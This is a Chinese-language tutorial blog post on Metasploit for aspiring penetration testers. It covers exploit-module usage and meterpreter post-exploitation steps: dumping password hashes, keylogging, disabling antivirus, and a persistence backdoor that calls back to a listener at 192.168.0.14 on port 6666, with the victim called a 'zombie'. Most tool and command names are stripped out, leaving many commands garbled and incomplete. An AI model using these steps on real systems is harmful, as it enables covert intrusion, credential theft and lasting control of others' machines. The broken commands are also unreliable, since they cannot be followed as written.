手机渗透神器/渗透工具cs-详细白帽子自学路线
基础知识
:一个刻意制作出来包含漏洞的基于的Linux虚拟机操作系统。
DVWA:一个针对Web应用的Web漏洞实验平台,是一个进行安全脆弱性鉴定的 PHP/MySQL Web 应用。
OWASP :主要用于Web漏洞实验。
OWASP iGoat:一款针对苹果手机iOS系统的一个渗透测试平台。
Labs:一款针对手机系统的渗透测试平台。
攻击载荷(): 漏洞利用执行后的代码,或称为目标系统在被渗透攻击 后执行的代码;通常称之,在目标系统上执行了之后,才执行命令shell;
渗透攻击(): 漏洞利用程序。流行的渗透攻击 技术包括缓冲区溢出、Web应用程序 漏洞攻击 ,以及利用配置错误等;
三种启动方式
、 、
是最灵活、功能最全、应用最广的(其中 辅助扫描工具)
图形化界面
加载辅助工具包
把rb文件复制到//usr/share/-//
例如#:cp .rb /usr/share/-//
msf5#: load
执行#: -e -t -r -p
------------------------------------------------------------------------------------------------
执行一次漏洞文件的全过程:
步骤1>引入漏洞模块#:use //smb/
步骤2>显示漏洞相关参数#:show
步骤3>参数赋值 #:set RHOST 192.168.1.100
步骤4>指定 #: set //
步骤5>再设置相关参数
步骤6>执行攻击#:
其它:
常用命令:
关键词(如)
back 退回上一步:
会话查看#: -i
------------------------------------------------------------------------------------------------
工具
是的一个扩展组件,通过#: -i id
常用命令
截屏#:
系统信息#:
获取密码管理员hash值#:(初验不成功,待验证)
查看进程#:ps
改变进程#: 896(进程pid)
打开远程桌面#:run -e (初验不成功,待验证)
记录键盘#: 之后执行#:
运行VNC#:run vnc
关闭杀毒软件#:run
读取进程文件#:run
帮忙#:help
---------------------********-------控制持久化操作如下---------成功实现过-----------*************----------
#:run -X -i 50 -p 6666 -r 192.168.0.14
解释:run -X -i 多少秒数重连 -p 端口 -r 监控机
---退出>
#:use multi/
#:set //
#:set Lport 6666
#:set lhost 192.168.0.14
#:
注:肉鸡关机后,上述方法就失效了
版权说明:请尊重原创版权,版权归磊氏信息安全所有。
~
网络安全学习,我们一起交流
~